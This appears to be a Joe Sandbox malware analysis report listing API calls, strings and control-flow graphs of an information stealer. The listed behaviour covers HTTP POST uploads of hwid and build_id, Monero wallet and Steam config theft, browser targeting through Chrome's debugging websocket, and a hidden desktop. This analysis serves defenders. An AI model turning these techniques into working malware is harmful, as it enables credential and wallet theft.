                                                                                                                                                                                                                                                                                        • Part of subcall function 00402790: InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 004028FA
                                                                                                                                                                                                                                                                                        • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                      • InternetOpenA.WININET(?,?,?,?,?), ref: 00402B3A
                                                                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,https,?,?,?,?,?), ref: 00402B49
                                                                                                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00403003
                                                                                                                                                                                                                                                                                        • Part of subcall function 004113B0: GetSystemTime.KERNEL32(?,ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890,0042150A), ref: 004113D8
                                                                                                                                                                                                                                                                                        • Part of subcall function 004113B0: lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0042150A), ref: 0041143E
                                                                                                                                                                                                                                                                                        • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                        • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                      • InternetConnectA.WININET ref: 00402C85
                                                                                                                                                                                                                                                                                      • HttpOpenRequestA.WININET(00000000,POST,?,HTTP/1.1,00000000,00000000,00000000,00000000), ref: 00402CC4
                                                                                                                                                                                                                                                                                      • InternetSetOptionA.WININET(?,0000001F,?,00000004), ref: 00402CF4
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?,?,?,?,?,0042150A,?,?,?,?,?,",?,?,build_id), ref: 00402EF9
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 00402F16
                                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000BB8), ref: 00402F39
                                                                                                                                                                                                                                                                                      • InternetReadFile.WININET(?,?,000007CF,?), ref: 00402F86
                                                                                                                                                                                                                                                                                      • InternetReadFile.WININET(?,?,000007CF,?), ref: 00402FD0
                                                                                                                                                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 00402FE4
                                                                                                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00402FF9
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Internet$lstrcpylstrlen$CloseHandle$FileOpenReadlstrcat$ConnectCrackHttpOptionRequestSleepSystemTime
                                                                                                                                                                                                                                                                                      • String ID: "$------$Content-Disposition: form-data; name="$Content-Type: multipart/form-data; boundary=----$ERROR$HTTP/1.1$POST$build_id$https$hwid

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 4022 404ea0-404ed3 call 41e9b0 InternetOpenA 4025 404f12-404f33 call 402400 4022->4025 4026 404ed5-404ee1 4022->4026 4035 405332-40533c 4025->4035 4027 404ee3-404eed 4026->4027 4028 404f38-404f44 4026->4028 4031 404ef0-404f0e 4027->4031 4030 404f50-404f6e 4028->4030 4030->4030 4033 404f70 4030->4033 4031->4031 4034 404f10 4031->4034 4036 404f75-404f8d 4033->4036 4034->4036 4037 404fa7-404fc6 call 40ee20 4036->4037 4038 404f8f-404fa2 call 402400 4036->4038 4042 404fe8-404ff4 4037->4042 4043 404fc8-404fd3 4037->4043 4038->4037 4045 404ff7-40502f call 406b00 4042->4045 4044 404fd5-404fe6 memcpy 4043->4044 4043->4045 4044->4045 4048 405051-40505d 4045->4048 4049 405031-40503c 4045->4049 4050 405060-405083 4048->4050 4049->4050 4051 40503e-40504f memcpy 4049->4051 4052 405085-405095 4050->4052 4053 4050c9-4050e5 4050->4053 4051->4050 4054 4050c0-4050c6 ??3@YAXPAX@Z 4052->4054 4055 405097-405099 4052->4055 4056 4050e7-4050f7 4053->4056 4057 40512b-405130 4053->4057 4054->4053 4060 40533f-405344 _invalid_parameter_noinfo_noreturn 4055->4060 4061 40509f-4050a4 4055->4061 4062 405122-405128 ??3@YAXPAX@Z 4056->4062 4063 4050f9-4050fb 4056->4063 4058 405132-405136 4057->4058 4059 405138 4057->4059 4064 40513c-40515a InternetOpenUrlA 4058->4064 4059->4064 4061->4060 4065 4050aa-4050af 4061->4065 4062->4057 4063->4060 4066 405101-405106 4063->4066 4067 405160-40518b InternetReadFile 4064->4067 4068 405261-40528e InternetCloseHandle call 402400 4064->4068 4065->4060 4069 4050b5-4050b8 4065->4069 4066->4060 4070 40510c-405111 4066->4070 4071 4051e5-405208 InternetCloseHandle * 2 call 4053f0 4067->4071 4072 40518d-405193 4067->4072 4082 4052f3-4052fa 4068->4082 4069->4060 4073 4050be 
4069->4073 4070->4060 4075 405117-40511a 4070->4075 4083 405290 4071->4083 4084 40520e-405227 call 4053f0 4071->4084 4072->4071 4077 405195-405199 4072->4077 4073->4054 4075->4060 4079 405120 4075->4079 4081 4051a0-4051aa 4077->4081 4079->4062 4085 4051c0 4081->4085 4086 4051ac-4051b5 strlen 4081->4086 4087 405330 4082->4087 4088 4052fc-40530c 4082->4088 4093 405297-4052b1 call 402400 4083->4093 4084->4093 4099 405229-405240 call 4053f0 4084->4099 4090 4051c2-4051db call 406b00 InternetReadFile 4085->4090 4086->4090 4087->4035 4091 405327-40532d ??3@YAXPAX@Z 4088->4091 4092 40530e-405310 4088->4092 4090->4071 4104 4051dd-4051e3 4090->4104 4091->4087 4092->4060 4097 405312-405317 4092->4097 4098 4052b6-4052bd 4093->4098 4097->4060 4101 405319-40531e 4097->4101 4098->4082 4102 4052bf-4052cf 4098->4102 4099->4093 4111 405242-40525f call 40ed20 4099->4111 4101->4060 4105 405320-405323 4101->4105 4106 4052d1-4052d3 4102->4106 4107 4052ea-4052f0 ??3@YAXPAX@Z 4102->4107 4104->4071 4104->4081 4105->4060 4109 405325 4105->4109 4106->4060 4110 4052d5-4052da 4106->4110 4107->4082 4109->4091 4110->4060 4112 4052dc-4052e1 4110->4112 4111->4098 4112->4060 4114 4052e3-4052e6 4112->4114 4114->4060 4116 4052e8 4114->4116 4116->4107
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • InternetOpenA.WININET(?,?,?,?,00002407), ref: 00404ECB
                                                                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,?,00000000,http://localhost:,00000011), ref: 00404FDC
                                                                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,?,00000000,http://localhost:,00000011), ref: 00405045
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,http://localhost:,00000011), ref: 004050C1
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,00000000,http://localhost:,00000011), ref: 00405123
                                                                                                                                                                                                                                                                                      • InternetOpenUrlA.WININET ref: 00405152
                                                                                                                                                                                                                                                                                      • InternetReadFile.WININET(00000000,00000000,00000FFF,?), ref: 00405183
                                                                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 004051AD
                                                                                                                                                                                                                                                                                      • InternetReadFile.WININET(00000000,00000000,00000FFF,?), ref: 004051D3
                                                                                                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 004051E6
                                                                                                                                                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 004051EF
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Internet$??3@CloseFileHandleOpenReadmemcpy$strlen
                                                                                                                                                                                                                                                                                      • String ID: "webSocketDebuggerUrl":$"ws://$-$/json$http://localhost:
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,00000000), ref: 00410DCE
                                                                                                                                                                                                                                                                                      • RegEnumKeyExA.KERNEL32 ref: 00410E10
                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00410E34
                                                                                                                                                                                                                                                                                      • RegEnumKeyExA.KERNEL32 ref: 00410E65
                                                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00410E89
                                                                                                                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 00410EA0
                                                                                                                                                                                                                                                                                      • RegQueryValueExA.KERNEL32(?,DisplayName,00000000,?,?,?), ref: 00410ECD
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00410EDC
                                                                                                                                                                                                                                                                                      • RegQueryValueExA.KERNEL32(?,DisplayVersion,00000000,?,?,?,?,?,?,?,?,00421509), ref: 00410F54
                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00410FB5
                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00410FBF
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Close$EnumOpenQueryValue$lstrcpylstrlenwsprintf
                                                                                                                                                                                                                                                                                      • String ID: - $%s\%s$?$DisplayName$DisplayVersion$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                                                                                                                                                                                                                      • API String ID: 2273887489-394048932
                                                                                                                                                                                                                                                                                      • Opcode ID: d9187026738edcb4394eb33dfdd7146f94529fe6e8aa5b07d585f48a1e59a4db
                                                                                                                                                                                                                                                                                      • Instruction ID: a9482f3620ee90973302920576edf614ea85895da66572170e0d69f411f645d8
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d9187026738edcb4394eb33dfdd7146f94529fe6e8aa5b07d585f48a1e59a4db
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CD51A371204314ABD710AF61DC85BAFBBE9EF84744F00881EF48A97251DBB89DC5CB96
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040149A
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 004014B7
                                                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 004014C5
                                                                                                                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 004014DE
                                                                                                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 004014F9
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                        • Part of subcall function 00413E50: Sleep.KERNEL32(000003E8,?,?,?), ref: 00413F0F
                                                                                                                                                                                                                                                                                        • Part of subcall function 00413E50: CreateThread.KERNEL32(00000000,00000000,00416EA0,?,00000000,00000000), ref: 00413F6C
                                                                                                                                                                                                                                                                                        • Part of subcall function 00413E50: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00413F78
                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00401505
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 00401511
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,.keys), ref: 00401526
                                                                                                                                                                                                                                                                                      • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401611
                                                                                                                                                                                                                                                                                      • DeleteFileA.KERNEL32(00000000,000000FF), ref: 004016DA
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: FileHeap$AllocCloseCopyCreateDeleteObjectOpenProcessQuerySingleSleepThreadValueWaitlstrcatlstrcpylstrlenmemset
                                                                                                                                                                                                                                                                                      • String ID: C:\ProgramData\$SOFTWARE\monero-project\monero-core$Wallets$\Monero\wallet.keys$wallet_path
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 004107D4
                                                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 004107E2
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 004107F4
                                                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 00410802
                                                                                                                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020119,?), ref: 0041081A
                                                                                                                                                                                                                                                                                      • RegQueryValueExA.KERNEL32(?,CurrentBuildNumber,00000000,00000000,00000000,?), ref: 00410837
                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00410840
                                                                                                                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020119,?,00000000), ref: 0041086D
                                                                                                                                                                                                                                                                                      • RegQueryValueExA.KERNEL32(?,ProductName,00000000,00000000,00000000,000000FF), ref: 0041088A
                                                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00410893
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                                                                                      • String ID: CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Windows 11
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                        • Part of subcall function 004108B0: GetProcessHeap.KERNEL32(00000000,?,00401148,?,00420C50), ref: 004108B2
                                                                                                                                                                                                                                                                                        • Part of subcall function 004108B0: HeapAlloc.KERNEL32(00000000,00000000,00000104,?,00401148,?,00420C50), ref: 004108C0
                                                                                                                                                                                                                                                                                        • Part of subcall function 004108B0: GetUserNameA.ADVAPI32(00000000), ref: 004108D3
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,?,?,00000000,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 004172E5
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00418606), ref: 004172EC
                                                                                                                                                                                                                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,00418606), ref: 0041730C
                                                                                                                                                                                                                                                                                      • CreateDirectoryA.KERNEL32(00000000,00000000,?,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 004175AD
                                                                                                                                                                                                                                                                                      • InternetOpenA.WININET ref: 00417682
                                                                                                                                                                                                                                                                                      • InternetOpenA.WININET ref: 004176A6
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410540: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0041055C
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410540: GetVolumeInformationA.KERNEL32 ref: 004105AE
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410540: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0041060D
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410540: HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 0041061B
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410540: wsprintfA.USER32 ref: 00410652
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410540: lstrcatA.KERNEL32(00000000,00421178), ref: 00410661
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410540: lstrlenA.KERNEL32(00000000,?), ref: 00410687
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402AA0: InternetOpenA.WININET(?,?,?,?,?), ref: 00402B3A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402AA0: StrCmpCA.SHLWAPI(?,https,?,?,?,?,?), ref: 00402B49
                                                                                                                                                                                                                                                                                        • Part of subcall function 004132F0: StrCmpCA.SHLWAPI(00000000,block), ref: 00413315
                                                                                                                                                                                                                                                                                        • Part of subcall function 004132F0: ExitProcess.KERNEL32 ref: 0041331D
                                                                                                                                                                                                                                                                                        • Part of subcall function 00403920: InternetOpenA.WININET(?,?,?,?,?), ref: 004039B9
                                                                                                                                                                                                                                                                                        • Part of subcall function 00403920: StrCmpCA.SHLWAPI(?,https,?,?,?,?,?), ref: 004039C8
                                                                                                                                                                                                                                                                                        • Part of subcall function 00412C40: strtok_s.MSVCRT ref: 00412C64
                                                                                                                                                                                                                                                                                        • Part of subcall function 00412C40: strtok_s.MSVCRT ref: 00412CA9
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040E440: StrCmpCA.SHLWAPI(00000000,chrome), ref: 0040E4B3
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890,?,?,?,?), ref: 00417C10
                                                                                                                                                                                                                                                                                        • Part of subcall function 00403920: InternetConnectA.WININET ref: 00403B08
                                                                                                                                                                                                                                                                                        • Part of subcall function 00403920: HttpOpenRequestA.WININET(00000000,POST,?,HTTP/1.1,00000000,00000000,00000000,00000000), ref: 00403B4B
                                                                                                                                                                                                                                                                                        • Part of subcall function 00403920: InternetSetOptionA.WININET(?,0000001F,00010300,00000004), ref: 00403B75
                                                                                                                                                                                                                                                                                        • Part of subcall function 00412E50: strtok_s.MSVCRT ref: 00412E74
                                                                                                                                                                                                                                                                                        • Part of subcall function 00412F60: strtok_s.MSVCRT ref: 00412F88
                                                                                                                                                                                                                                                                                        • Part of subcall function 00416FC0: lstrlenA.KERNEL32(00000000), ref: 00417011
                                                                                                                                                                                                                                                                                        • Part of subcall function 00414FE0: RegOpenKeyExA.ADVAPI32(80000001,Software\Valve\Steam,00000000,00020119,?), ref: 0041506F
                                                                                                                                                                                                                                                                                        • Part of subcall function 00414FE0: RegQueryValueExA.ADVAPI32(?,SteamPath,00000000,00000000,?,000000FF), ref: 00415090
                                                                                                                                                                                                                                                                                        • Part of subcall function 00414FE0: RegCloseKey.ADVAPI32(?), ref: 00415099
                                                                                                                                                                                                                                                                                        • Part of subcall function 00414FE0: lstrcatA.KERNEL32(?,?,?,00000104), ref: 004150B8
                                                                                                                                                                                                                                                                                        • Part of subcall function 00414FE0: lstrcatA.KERNEL32(?,\config\), ref: 004150C4
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      • C:\ProgramData\, xrefs: 0041756F
                                                                                                                                                                                                                                                                                      • ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890, xrefs: 00417C0B
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Open$Internet$Heaplstrcatlstrcpylstrlenstrtok_s$Process$AllocCloseCreateDirectoryEvent$ConnectExitHandleHttpInformationNameOptionQueryRequestUserValueVolumeWindowswsprintf
                                                                                                                                                                                                                                                                                      • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890$C:\ProgramData\
                                                                                                                                                                                                                                                                                      • API String ID: 818183501-1067945926
                                                                                                                                                                                                                                                                                      • Opcode ID: 894a392c71254b7d9ed5b6b1ae27d055c534c6700de8925957bfa70aa10c7508
                                                                                                                                                                                                                                                                                      • Instruction ID: d3f20ebcfaa0f86e13ddee9407f56ad69643857b77905c87f50bde3cae6408d9
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 894a392c71254b7d9ed5b6b1ae27d055c534c6700de8925957bfa70aa10c7508
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 43C2A331C10B599BDB11EFB5C9815EEB378BF18308F00964EE85567142EB78BAC9CB94
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(00000000,chrome), ref: 0040E4B3
                                                                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(00000000,firefox), ref: 0040E740
                                                                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(00000000,opera), ref: 0040E5B9
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040B4E0: StrCmpCA.SHLWAPI(00000000,Opera GX,0042150A,0042150A), ref: 0040B523
                                                                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(00000000,chrome), ref: 0040E923
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: lstrcpy
                                                                                                                                                                                                                                                                                      • String ID: Stable\$chrome$firefox$opera
                                                                                                                                                                                                                                                                                      • API String ID: 3722407311-3146807071
                                                                                                                                                                                                                                                                                      • Opcode ID: 6706b4d3de68381de9acf2f3cf5a3500a8a77dcd0908f9563c4221972a14ca8e
                                                                                                                                                                                                                                                                                      • Instruction ID: 22bc5863ea798df5109445d1e364a8a74c8a3d857c00c7bd5e27f083e93039e9
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6706b4d3de68381de9acf2f3cf5a3500a8a77dcd0908f9563c4221972a14ca8e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 94429131D00B099BDB05EF75C981AEAB7B4FF18308F008159F9556B252EB38BAD5CB94
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0041055C
                                                                                                                                                                                                                                                                                      • GetVolumeInformationA.KERNEL32 ref: 004105AE
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0041060D
                                                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 0041061B
                                                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00410652
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,00421178), ref: 00410661
                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?), ref: 00410687
                                                                                                                                                                                                                                                                                        • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcatlstrcpylstrlenwsprintf
                                                                                                                                                                                                                                                                                      • String ID: %08lX%04lX%lu$:\$C
                                                                                                                                                                                                                                                                                      • API String ID: 1059865016-545181305
                                                                                                                                                                                                                                                                                      • Opcode ID: 90bb885e6cb9c3f254673d7949eac57a71e00247e07ca877e6107e12700a4b67
                                                                                                                                                                                                                                                                                      • Instruction ID: daccc5cf811b00eb36f485bb9bb5cfb034b4705064687d02f987ca2459062bbc
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 90bb885e6cb9c3f254673d7949eac57a71e00247e07ca877e6107e12700a4b67
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6141D4705083107BD301BB718C85BBF7AE99FC5784F00491EF58597291EBBC99829BAA
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,ChromeBuildTools,00000104), ref: 00407130
                                                                                                                                                                                                                                                                                      • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00407142
                                                                                                                                                                                                                                                                                      • CreateDesktopA.USER32 ref: 00407166
                                                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,00000000,?,OCALAPPDATA,00000000,?,0000001C), ref: 004071BD
                                                                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00407222
                                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8,00000000,00000000,?,00000000,?), ref: 0040725B
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
